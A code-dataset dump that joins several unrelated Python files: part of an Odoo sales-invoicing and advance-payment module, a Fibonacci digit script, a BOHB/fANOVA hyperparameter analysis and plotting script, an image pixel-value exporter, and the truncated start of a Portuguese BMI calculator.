}}\r\n\r\n def _add_product(self, product, qty=1.0):\r\n corresponding_line = self.order_line.filtered(\r\n lambda x: x.product_id == product)\r\n if corresponding_line:\r\n corresponding_line.product_uom_qty += qty\r\n else:\r\n line = self.order_line.new({\r\n 'product_id': product.id,\r\n 'product_uom_qty': qty,\r\n 'order_id': self.id,\r\n })\r\n line.product_id_change()\r\n return True\r\n\r\n\r\n def recalculate_prices(self):\r\n for record in self:\r\n if record.order_line:\r\n for line in record.order_line:\r\n res = line.product_id_change()\r\n res2 = line._onchange_discount()\r\n #print \"######### RES >>> \",res\r\n #self.update(res)\r\n return True\r\n\r\n def re_inviced_public(self):\r\n for rec in self:\r\n # invoice_obj = self.env['account.move']\r\n # invoice_line_obj = self.env['account.move.line']\r\n # rec.re_invoiced = True\r\n # invoice_vals = rec._prepare_invoice()\r\n # invoice_id = invoice_obj.create(invoice_vals)\r\n # for line in rec.order_line:\r\n # invoice_line_vals = line._prepare_invoice_line()\r\n # invoice_line_id = invoice_line_obj.sudo().with_context(default_move_type='out_invoice').create(invoice_line_vals)\r\n # invoice_line_id.write({'invoice_id': invoice_id.id})\r\n\r\n # invoice_id.compute_taxes()\r\n invoice_ids = rec._create_invoice_single()\r\n for inv in invoice_ids:\r\n for line in inv.invoice_line_ids:\r\n line.order_to_global_id = self.id\r\n line.re_invoiced = True\r\n return {\r\n 'name': _('Refacturacion del Pedido %s' % rec.name),\r\n 'view_mode': 'form',\r\n 'view_id': self.env.ref('account.view_move_form').id,\r\n 'res_model': 'account.move',\r\n 'context': \"{}\", # self.env.context\r\n 'type': 'ir.actions.act_window',\r\n 'res_id': invoice_ids[0].id,\r\n }\r\n \r\n def _create_invoice_single(self, grouped=False, final=False, date=None):\r\n \"\"\"\r\n Create the invoice associated to the SO.\r\n :param grouped: if True, invoices are grouped by SO id. If False, invoices are grouped by\r\n (partner_invoice_id, currency)\r\n :param final: if True, refunds will be generated if necessary\r\n :returns: list of created invoices\r\n \"\"\"\r\n \r\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\r\n\r\n # 1) Create invoices.\r\n invoice_vals_list = []\r\n invoice_item_sequence = 0\r\n for order in self:\r\n order = order.with_company(order.company_id)\r\n current_section_vals = None\r\n down_payments = order.env['sale.order.line']\r\n\r\n # Invoice values.\r\n invoice_vals = order._prepare_invoice()\r\n\r\n # Invoice line values (keep only necessary sections).\r\n invoice_lines_vals = []\r\n for line in order.order_line:\r\n if line.display_type == 'line_section':\r\n current_section_vals = line._prepare_invoice_line(sequence=invoice_item_sequence + 1)\r\n continue\r\n\r\n if current_section_vals:\r\n invoice_item_sequence += 1\r\n invoice_lines_vals.append(current_section_vals)\r\n current_section_vals = None\r\n invoice_item_sequence += 1\r\n prepared_line = line._prepare_invoice_line(quantity=line.product_uom_qty)\r\n invoice_lines_vals.append(prepared_line)\r\n\r\n # If down payments are present in SO, group them under common section\r\n if down_payments:\r\n invoice_item_sequence += 1\r\n down_payments_section = order._prepare_down_payment_section_line(sequence=invoice_item_sequence)\r\n invoice_lines_vals.append(down_payments_section)\r\n for down_payment in down_payments:\r\n invoice_item_sequence += 1\r\n invoice_down_payment_vals = down_payment._prepare_invoice_line(sequence=invoice_item_sequence)\r\n invoice_lines_vals.append(invoice_down_payment_vals)\r\n\r\n invoice_vals['invoice_line_ids'] = [(0, 0, invoice_line_id) for invoice_line_id in invoice_lines_vals]\r\n\r\n invoice_vals_list.append(invoice_vals)\r\n\r\n # 2) Manage 'grouped' parameter: group by (partner_id, currency_id).\r\n if not grouped:\r\n new_invoice_vals_list = []\r\n invoice_grouping_keys = self._get_invoice_grouping_keys()\r\n for grouping_keys, invoices in groupby(invoice_vals_list, key=lambda x: [x.get(grouping_key) for grouping_key in invoice_grouping_keys]):\r\n origins = set()\r\n payment_refs = set()\r\n refs = set()\r\n ref_invoice_vals = None\r\n for invoice_vals in invoices:\r\n if not ref_invoice_vals:\r\n ref_invoice_vals = invoice_vals\r\n else:\r\n ref_invoice_vals['invoice_line_ids'] += invoice_vals['invoice_line_ids']\r\n origins.add(invoice_vals['invoice_origin'])\r\n payment_refs.add(invoice_vals['payment_reference'])\r\n refs.add(invoice_vals['ref'])\r\n ref_invoice_vals.update({\r\n 'ref': ', '.join(refs)[:2000],\r\n 'invoice_origin': ', '.join(origins),\r\n 'payment_reference': len(payment_refs) == 1 and payment_refs.pop() or False,\r\n })\r\n new_invoice_vals_list.append(ref_invoice_vals)\r\n invoice_vals_list = new_invoice_vals_list\r\n\r\n # 3) Create invoices.\r\n # Manage the creation of invoices in sudo because a salesperson must be able to generate an invoice from a\r\n # sale order without \"billing\" access rights. However, he should not be able to create an invoice from scratch.\r\n moves = self.env['account.move'].sudo().with_context(default_move_type='out_invoice').create(invoice_vals_list)\r\n # 4) Some moves might actually be refunds: convert them if the total amount is negative\r\n # We do this after the moves have been created since we need taxes, etc. to know if the total\r\n # is actually negative or not\r\n if final:\r\n moves.sudo().filtered(lambda m: m.amount_total < 0).action_switch_invoice_into_refund_credit_note()\r\n for move in moves:\r\n move.message_post_with_view('mail.message_origin_link',\r\n values={'self': move, 'origin': move.line_ids.mapped('sale_line_ids.order_id')},\r\n subtype_id=self.env.ref('mail.mt_note').id\r\n )\r\n return moves \r\n\r\n\r\n\r\n ### Reemplazamos Imprimir por el Ticket ###\r\n def print_ticket(self):\r\n self.filtered(lambda s: s.state == 'draft').write({'state': 'sent'})\r\n #return self.env['report'].get_action(self, 'easy_counter_sales_management.template_easy_ticket')\r\n return self.env.ref('fx_sale_advance_payment.report_eaty_order_ticket').report_action(self)\r\n\r\nclass account_payment(models.Model):\r\n _inherit = 'account.payment'\r\n\r\n sale_order_id = fields.Many2one('sale.order','Pedido de Venta', copy=False)\r\n easy_refund = fields.Float('Cambio')\r\n is_global_invoice_move = fields.Boolean('Apunte Agrupador')\r\n global_invoice_id = fields.Many2one('account.invoice','Factura Global')\r\n\r\n create_in_state_sale = fields.Selection([('draft', 'Borrador'),\r\n ('confirm', 'Confirmado')],\r\n default='confirm',\r\n string=\"Estado del Pago\")\r\n\r\n def create_sale_adv_payment(self):\r\n amount_residual = self.sale_order_id.amount_total-self.sale_order_id.amount_payment\r\n if self.amount <= 0.0:\r\n raise ValidationError(_(\"El monto del pago no puede ser negativo o Cero.\"))\r\n if self.create_in_state_sale == 'confirm':\r\n self.action_post()\r\n if self.easy_refund:\r\n self.amount = self.amount - self.easy_refund\r\n if self.env.context.get('active_id'):\r\n sale_id = self.env['sale.order'].browse(self.env.context.get('active_id'))\r\n sale_id.write({'adv_payment_ids': [(4, self.id)]})\r\n if self.sale_order_id and self.create_in_state_sale == 'confirm': \r\n # self.write({\r\n # 'sale_order_id': sale_id.id,\r\n # })\r\n amount_payment = self.amount+sale_id.amount_payment\r\n sale_id.write({'amount_payment':amount_payment})\r\n amount_payment = amount_payment+0.01\r\n if amount_payment >= sale_id.amount_total:\r\n sale_id.write({'total_payment':True, 'user_payment_register_id': self.env.user.id}) \r\n if sale_id.amount_payment > sale_id.amount_total+0.01: \r\n raise ValidationError(_(\"El monto del pago no puede superar al monto adeudado.\"))\r\n\r\n return True\r\n\r\n @api.onchange('easy_refund','sale_order_id','amount')\r\n def on_change_easy_refund(self):\r\n if self.sale_order_id:\r\n amount_residual = self.sale_order_id.amount_total-self.sale_order_id.amount_payment\r\n amount_to_pay = self.sale_order_id.amount_payment + self.amount\r\n if amount_to_pay > self.sale_order_id.amount_total:\r\n #self.amount = self.sale_order_id.amount_total\r\n easy_refund = amount_to_pay - self.sale_order_id.amount_total\r\n self.easy_refund = easy_refund\r\n self.sale_order_id.write({'easy_refund':easy_refund})\r\n else:\r\n if not self.amount:\r\n self.amount = self.sale_order_id.amount_total\r\n else:\r\n self.amount = self.amount\r\n\r\n def action_post(self):\r\n context = self._context\r\n res = super(account_payment, self).action_post()\r\n active_model = context.get('active_model', '')\r\n if active_model == 'sale.order':\r\n return res\r\n for rec in self:\r\n if rec.sale_order_id:\r\n amount_payment = rec.amount+rec.sale_order_id.amount_payment\r\n rec.sale_order_id.write({'amount_payment':amount_payment})\r\n amount_payment = amount_payment+0.01\r\n if amount_payment >= rec.sale_order_id.amount_total:\r\n rec.sale_order_id.write({'total_payment':True, 'user_payment_register_id': self.env.user.id}) \r\n if rec.sale_order_id.amount_payment > rec.sale_order_id.amount_total+0.01: \r\n raise ValidationError(_(\"El monto del pago no puede superar al monto adeudado.\"))\r\n return res\r\n\r\n def action_draft(self):\r\n res = super(account_payment, self).action_draft()\r\n for rec in self:\r\n if rec.sale_order_id:\r\n # if rec.sale_order_id.invoice_status == 'invoiced':\r\n # raise UserError(\"Error!\\nEl pedido de venta relacionado se encuentra Facturado.\\nRompa Conciliacion o consulte al Administrador.\")\r\n amount_payment = rec.sale_order_id.amount_payment - rec.amount\r\n vals = {\r\n 'total_payment': False,\r\n 'amount_payment': amount_payment,\r\n }\r\n rec.sale_order_id.write(vals)\r\n return res\r\n\r\n\r\nclass AccountInvoice(models.Model):\r\n _inherit = 'account.move'\r\n\r\n @api.depends('state', 'invoice_line_ids')\r\n def _get_orders_rel(self):\r\n for invoice in self:\r\n if type(invoice.id) == int:\r\n self.env.cr.execute(\"\"\"\r\n select sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n order_list = []\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res:\r\n if cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res if x]\r\n # print \"#### PEDIDOS RELACIONADOS >>> \",order_list\r\n if not order_list:\r\n order_list = []\r\n self.env.cr.execute(\"\"\"\r\n select order_to_global_id\r\n from account_move_line where move_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res:\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list_2 = [x[0] for x in cr_res]\r\n if order_list_2:\r\n order_list = order_list+order_list_2\r\n if not order_list:\r\n invoice_line_list = [x.id for x in invoice.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n\r\n invoice.update({\r\n 'sale_ids': order_list,\r\n })\r\n else:\r\n invoice.update({\r\n 'sale_ids': False,\r\n })\r\n\r\n\r\n @api.depends('sale_ids')\r\n def _get_orders(self):\r\n for rec in self:\r\n orders_count = 0\r\n orders_list = []\r\n if rec.sale_ids:\r\n for order in rec.sale_ids:\r\n if order:\r\n if order.id not in orders_list:\r\n orders_list.append(order.id)\r\n rec.orders_count = len(orders_list)\r\n\r\n orders_count = fields.Integer(string='# of Pedidos', compute='_get_orders', readonly=True)\r\n\r\n sale_ids = fields.Many2many(\"sale.order\", string='Pedidos', compute=\"_get_orders_rel\", readonly=True, copy=False)\r\n is_global_invoice = fields.Boolean('Es una Factura Global', copy=False)\r\n\r\n\r\n def action_view_adv_sale_orders(self):\r\n action = self.env.ref('sale.action_orders').read()[0]\r\n action['domain'] = [('id', 'in', self.sale_ids.ids)] if self.sale_ids.ids else []\r\n action['context'] = {'create': 0}\r\n return action\r\n\r\n \r\n def action_post(self):\r\n res = super(AccountInvoice, self).action_post()\r\n mail_compose_message_pool = self.env['mail.compose.message']\r\n attachment_obj = self.env['ir.attachment']\r\n account_payment_obj = self.env['account.payment'].sudo()\r\n account_move_obj = self.env['account.move'].sudo()\r\n account_move_line_obj = self.env['account.move.line'].sudo()\r\n for rec in self.filtered(lambda w: w.move_type in ('out_invoice','out_refund') and \\\r\n w.amount_total): \r\n if rec.move_type == 'out_invoice':\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (rec.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n # print \"####### order_list >>>> \",order_list\r\n if not order_list:\r\n self.env.cr.execute(\"\"\"\r\n select sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (rec.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n return res\r\n ### Quitando las Excepciones de Pago ###\r\n self.env.cr.execute(\"\"\"\r\n select id from sale_order \r\n where id in %s and payment_exception=False;\r\n \"\"\",(tuple(order_list),))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = [x[0] for x in cr_res]\r\n ### FIN ###\r\n\r\n if not order_list:\r\n invoice_line_list = [x.id for x in rec.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n if not order_list:\r\n return res\r\n payment_list = account_payment_obj.search([('state','in',('posted','reconciled')),('sale_order_id','in',tuple(order_list))])\r\n # self.env.cr.execute(\"\"\"\r\n # select id from account_payment\r\n # where sale_order_id in %s \r\n # and state in ('posted','reconciled') ;\r\n # \"\"\",(tuple(order_list),))\r\n # cr_res = self.env.cr.fetchall()\r\n # payment_list = [x[0] for x in cr_res]\r\n\r\n return res\r\n\r\n def reconcile_payments_sale_order(self):\r\n payment_obj = self.env['account.payment']\r\n account_move_obj = self.env['account.move'].sudo()\r\n account_move_line_obj = self.env['account.move.line'].sudo()\r\n for invoice in self:\r\n ### Si no es Factura Global ###\r\n self.env.cr.execute(\"\"\"\r\n select sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n raise UserError(_(\"Error!\\nNo existen registros de Pedidos a Conciliar.\"))\r\n if not order_list:\r\n invoice_line_list = [x.id for x in rec.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n\r\n for order in self.env['sale.order'].browse(order_list):\r\n if order.total_payment == False and order.payment_exception == False:\r\n raise UserError(_(\"Error!\\nEl Pedido %s no se encuentra pagado en su totalidad. \\nPuede activar la Excepcion de Pago en el Pedido o Pedidos Origen.\" % order.name))\r\n\r\n ### Conciliando ####\r\n payment_list = payment_obj.search([('state','in',('posted','reconciled')),('sale_order_id','in',tuple(order_list))])\r\n if not payment_list:\r\n raise UserError(_(\"Error!\\nNo existen Pagos para Conciliar.\"))\r\n\r\n ## Esto es para la version Normal con metodos de Odoo ###\r\n amls_to_reconcile = self.env['account.move.line']\r\n moves_to_reclasification = []\r\n for payment in payment_list.sudo():\r\n payment.write({'partner_id':invoice.partner_id.id})\r\n if payment.move_id and payment.move_id not in moves_to_reclasification:\r\n moves_to_reclasification.append(payment.move_id)\r\n amls_to_reconcile_payments = []\r\n if moves_to_reclasification:\r\n for mv in moves_to_reclasification:\r\n # Cambiando el Partner ##\r\n partner_list = [x.partner_id.id for x in mv.line_ids if x.partner_id]\r\n partner_list = list(set(partner_list))\r\n if partner_list:\r\n if invoice.partner_id.id != partner_list[0]:\r\n ## Cambiando el partner en las Partidas #\r\n for mv_line in mv.line_ids:\r\n mv_line.write({'partner_id':invoice.partner_id.id})\r\n mv_line.move_id.write({'partner_id':invoice.partner_id.id})\r\n for move_line in mv.line_ids.filtered(lambda r: not r.reconciled and r.account_id.internal_type in ('payable', 'receivable')):\r\n amls_to_reconcile += move_line\r\n amls_to_reconcile_payments.append(move_line)\r\n amls_to_reconcile += invoice.line_ids.filtered(lambda r: not r.reconciled and r.account_id.internal_type in ('payable', 'receivable'))\r\n amls_to_reconcile.reconcile()\r\n if invoice.currency_id.is_zero(invoice.amount_residual): \r\n new_pmt_state = 'paid'\r\n invoice.payment_state = new_pmt_state\r\n\r\n def reconcile_customer_invoices(self, move_id, invoice_ids):\r\n move_line_obj = self.env['account.move.line']\r\n\r\n for invoice in invoice_ids:\r\n invoice_move_line = invoice.move_id.line_ids.filtered(lambda r: r.account_id.internal_type=='receivable')\r\n expense_move_line = move_id.line_ids.filtered(lambda r: r.account_id.internal_type=='receivable' and r.partner_id.id==invoice.partner_id.id \\\r\n and invoice.reference in r.name and r.debit==invoice.residual)\r\n (invoice_move_line + expense_move_line).reconcile()\r\n \r\n return\r\n","sub_path":"fx_sale_advance_payment/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":40290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"270941643","text":"a=0\r\nb=1\r\ndes=10\r\n\r\nimport math\r\n\r\nfor n in range(2,1000000,1):\r\n c=b+a\r\n if (c/des)>=1:\r\n if (des==pow(10,999)):\r\n print('', n)\r\n des=des*10\r\n a=b\r\n b=c\r\n","sub_path":"25.Naloga/py.py","file_name":"py.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"576463887","text":"import os\nimport itertools\nimport argparse\nimport pickle\nimport collections\n#from IPython import embed\n\nimport result as hpres\nimport hpbandster.visualization as hpvis\n\nimport numpy as np\nimport scipy.stats as sps\n\nimport matplotlib\nmatplotlib.rcParams.update({'font.size': 14})\nimport matplotlib.pyplot as plt\n\nimport ConfigSpace as CS\nimport ConfigSpace.hyperparameters as CSH\n\nimport fanova\nimport fanova.visualizer\n\n\nparser = argparse.ArgumentParser(description='fANOVA analysis')\nparser.add_argument('--run_id', type=int, default=0)\nparser.add_argument('--working_directory', type=str, help='directory where to'\n ' store the live rundata', default='../bohb_output')\nparser.add_argument('--space', type=int, default=1, help='NASBench space')\nparser.add_argument('--seed', type=int, default=1, help='Seed')\nargs = parser.parse_args()\n\ns1_min = 0.05448716878890991\ns2_min = 0.057592153549194336\ns3_min = 0.05338543653488159\n\nArchitecture = collections.namedtuple('Architecture', ['adjacency_matrix', 'node_list'])\n\nclass Model(object):\n def __init__(self):\n self.validation_accuracy = None\n self.test_accuracy = None\n self.training_time = None\n self.arch = None\n\n def __str__(self):\n \"\"\"Prints a readable version of this bitstring.\"\"\"\n return '{0:b}'.format(self.arch)\n\n\ndef extract_HB_learning_curves(runs):\n \"\"\"\n function to get the hyperband learning curves.\n This is an example function showing the interface to use the\n HB_result.get_learning_curves method.\n Parameters:\n -----------\n runs: list of HB_result.run objects\n the performed runs for an unspecified config\n Returns:\n --------\n list of learning curves: list of lists of tuples\n An individual learning curve is a list of (t, x_t) tuples.\n This function must return a list of these. One could think\n of cases where one could extract multiple learning curves\n from these runs, e.g. if each run is an independent training\n run of a neural network on the data.\n \"\"\"\n sr = filter(lambda r: not r.loss is None, sorted(runs, key=lambda r: r.budget))\n value = [[(r.budget, r.info['test_error']) for r in sr],]\n return(value)\n\n\nbohb_logs_dir = '{}/search_space_{}/run{}-seed{}'.format(\n args.working_directory, args.space, args.run_id, args.seed\n)\nres = hpres.logged_results_to_HB_result(bohb_logs_dir)\n\nlcs_temp = res.get_learning_curves(lc_extractor = extract_HB_learning_curves)\nlcs = dict(lcs_temp)\nfor key, value in lcs_temp.items():\n if value == [[]]:\n del lcs[key]\n\ntool_tips = hpvis.default_tool_tips(res, lcs)\n#embed()\n\ninc_id = res.get_incumbent_id()\n\nid2conf = res.get_id2config_mapping()\n\ninc_trajectory = res.get_incumbent_trajectory()\nprint(inc_trajectory)\nprint(res.get_runs_by_id(inc_id))\n\nall_runs = list(filter(lambda r: not (r.info is None or r.loss is None),\n res.get_all_runs()))\n\n\nbudgets = res.HB_config['budgets']\n\nrun_times = np.array([(r.budget,\n r.time_stamps['finished']-r.time_stamps['started']) for\n r in all_runs])\n\n\ndef compare_val_and_test_error():\n errors = np.array([(r.info['test_error'], r.info['val_error']) for r in\n all_runs])\n plt.scatter(errors[:,0], errors[:,1])\n plt.plot([0,100], [0,100])\n plt.show()\n\n#plt.plot(inc_trajectory['times_finished'], inc_trajectory['losses'], label=run)\n#plt.legend()\n#plt.show()\n\n#hpvis.interactive_HB_plot(lcs, tool_tip_strings=tool_tips)\n\nruns_by_budget = {}\n\nfor b in budgets:\n runs_by_budget[b] = list(filter(lambda r: r.budget == b, all_runs))\n\n\ndef fanova_analysis():\n config_space = CS.ConfigurationSpace()\n #config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('learning_rate',\n # lower=1e-3,\n # upper=1,\n # log=True))\n config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('weight_decay',\n lower=1e-5,\n upper=1e-2,\n log=False))\n config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('cutout_prob',\n lower=0,\n upper=1,\n log=False))\n\n for b in reversed(budgets):\n X, y, new_cs = res.get_fANOVA_data(config_space, budgets=[b])\n f = fanova.fANOVA(X, y, new_cs)\n\n dir = './fANOVA/search_space_%d/run%d-seed%d/plots_%i'%(\n args.space, args.run_id, args.seed, b\n )\n os.makedirs(dir, exist_ok=True)\n\n dir_overleaf = './fANOVA_1/'\n os.makedirs(dir_overleaf, exist_ok=True)\n fig_name = './fANOVA_1'+'/s%d-run%d-seed%d-%d.png'%(\n args.space, args.run_id, args.seed, b\n )\n\n vis = fanova.visualizer.Visualizer(f, new_cs, dir, y_label='Validation Error')\n\n print(b)\n\n best_run_idx = np.argsort([r.loss for r in runs_by_budget[b]])[0]\n best_run = runs_by_budget[b][best_run_idx]\n\n inc_conf = id2conf[best_run.config_id]['config']\n inc_conf['budget'] = best_run.budget\n inc_line_style = {'linewidth': 3, 'color': 'lightgray', 'linestyle': 'dashed'}\n\n for i, hp in enumerate(config_space.get_hyperparameters()):\n print(f.quantify_importance([hp.name]))\n fig = vis.plot_marginal(i, show=False) # hp.name instead of i\n fig.axvline(x=inc_conf[hp.name], **inc_line_style)\n #fig.yscale('log')\n fig.xscale('log')\n fig.title('importance %3.1f%%'%(\n f.quantify_importance([hp.name])[(hp.name,)]['individual importance']*100)\n )\n fig.tight_layout()\n fig.savefig(dir+'/%s.png'%hp.name)\n fig.close()\n\n for hp1, hp2 in itertools.combinations(config_space.get_hyperparameters(), 2):\n n1, n2 = hp1.name,hp2.name\n fig = vis.plot_pairwise_marginal([n1,n2], show=False, three_d=False)\n #fig.axvline(x=inc_conf[n1], **inc_line_style)\n #fig.axhline(y=inc_conf[n2], **inc_line_style\n xlims = fig.xlim()\n ylims = fig.ylim()\n\n fig.scatter([inc_conf[n1]], [inc_conf[n2]], color='lightgray',\n s=800, marker='x', linewidth=5)\n fig.xlim(xlims)\n fig.ylim(ylims)\n\n importance = f.quantify_importance([n1,n2])[(n1,n2)]['total importance']\n #fig.title(\"importance %3.1f%%\"%(importance*100))\n fig.title(\"Space %d, Budget: %d epochs\"%(args.space, b))\n fig.tight_layout()\n fig.savefig(fig_name)\n fig.close()\n\n print(f.get_most_important_pairwise_marginals())\n #vis.create_all_plots(three_d=False)\n\n\ndef trajectory_plot():\n print(inc_trajectory.keys())\n plt.figure(figsize=(8,4.5))\n\n #plt.step(inc_trajectory['times_finished'], inc_trajectory['losses'],\n # where='post', color='black', linewidth=3)\n\n for b,c in zip(budgets, ['gray','blue', 'orange']):\n run_points = np.array([\n (r.time_stamps['finished']+(r.info['runtime'][0]*60),\n r.info['test_error'][0] - eval('s{}_min'.format(args.space)) ) for r in runs_by_budget[b]])\n plt.scatter(\n run_points[:,0], run_points[:,1], color=c,\n label='budget = %i epochs'%b, s=75\n )\n\n # plot RE incumbent\n re_path = 'regularized_evolution'\n runs = []\n for seed in range(6):\n filename = os.path.join(re_path,\n 'algo_RE_0_ssp_{}_seed_{}.obj'.format(args.space,\n seed))\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n runs.append(data)\n\n accuracies = list(map(lambda x: max(x, key=lambda y: y.test_accuracy).test_accuracy,\n runs))\n re_mean = np.mean(1 - np.asarray(accuracies) - eval('s{}_min'.format(args.space)))\n re_std = np.std(1 - np.asarray(accuracies) - eval('s{}_min'.format(args.space)))\n\n _x_values = np.arange(1800, 5e5)\n darts_error = np.zeros(_x_values.size)\n darts_error.fill(re_mean)\n plt.fill_between(_x_values, darts_error+re_std, darts_error-re_std,\n color='g', alpha=.3)\n plt.plot(_x_values, darts_error, color='g', label='RE')\n\n #plt.hlines(re_mean, xmin=0, xmax=3e5, color='g')\n\n\n #plt.scatter(inc_trajectory['times_finished'][:-1], inc_trajectory['losses'][:-1], c='red')\n plt.xscale('log')\n plt.xlim([4e4, 5e5]) #s3\n #plt.xlim([5e4, 5e5]) #s1\n #plt.xlim([5e4, 4e5]) #s2\n plt.yscale('log')\n #plt.ylim([5.6e-2, 1.3e-1]) #s1\n #plt.ylim([5.8e-2, 1.5e-1]) #s2\n plt.ylim([0.002, 2e-1]) #s3\n\n plt.ylabel('test regret')\n plt.xlabel('wallclock time [s]')\n plt.legend(fontsize=10)\n plt.title(\"Space %d\"%(args.space))\n plt.grid(True, which=\"both\",ls=\"-\")\n plt.tight_layout()\n\n os.makedirs('./incumbents', exist_ok=True)\n fig_name = './incumbents'+'/s%d-run%d-seed%d.png'%(\n args.space, args.run_id, args.seed\n )\n plt.savefig(fig_name)\n plt.show()\n #embed()\n\n#fanova_analysis()\ntrajectory_plot()\n#embed()\n","sub_path":"bohb_2nd/plots/analysis_RE.py","file_name":"analysis_RE.py","file_ext":"py","file_size_in_byte":9670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"451092993","text":"import os\nfrom PIL import Image\n\na = str(input(\"Images Dir -> \")) + \"\\\\\"\nb = a + \"pixelvalues\\\\\"\nx = int(input(\"num images (n(inclusive)) -> \"))\n\n\nif not os.path.exists(b):\n os.makedirs(b)\n\nfor i in range(0, x + 1):\n img = Image.open(a + str(i) + \".png\").convert('L')\n img.save(a + str(i) + \".png\")\n\nfor i in range(0, x + 1):\n im = Image.open(a + str(i) + '.png')\n height, width = im.size\n data = []\n\n for ecs in range(im.width):\n for why in range(im.height):\n data.append(str(im.getpixel((ecs, why))))\n\n #WRITING DATA TO TEXT FILE\n try:\n f = open(b + str(i) + \".txt\", 'x') #Create new file if a file does not exist\n f.close()\n except: #If file exists\n pass\n \n f = open(b + str(i) + \".txt\", 'w')\n f.write(\",\".join(data)) #Write data\n f.close() #Close 'f' for next loop","sub_path":"pixelvalue.py","file_name":"pixelvalue.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"252595424","text":"\"\"\"\nCalcular IMC - ler altura e peso\n\nabaixo de 18.5: Abaixo do peso\nEntre 18.5 e 25: Peso ideal\n25 até 30: Sobrepeso\n30 até 40: Obesidade\nacime de 40: Obesidade mórdida\n\"\"\"\npeso = float(input(\"Entre com o peso em KG: \"))\naltura = float(input(\"Entre com altura em metros: \"))\n\nIMC = peso/(altura*altura)\n\nif IMC < 18.5:\n print(\"Você esta \\033[7mabaixo do peso\\033[m, seu IMC e de {:.2f}\".format(IMC))\nelif IMC < 25:\n print(\"Você esta no 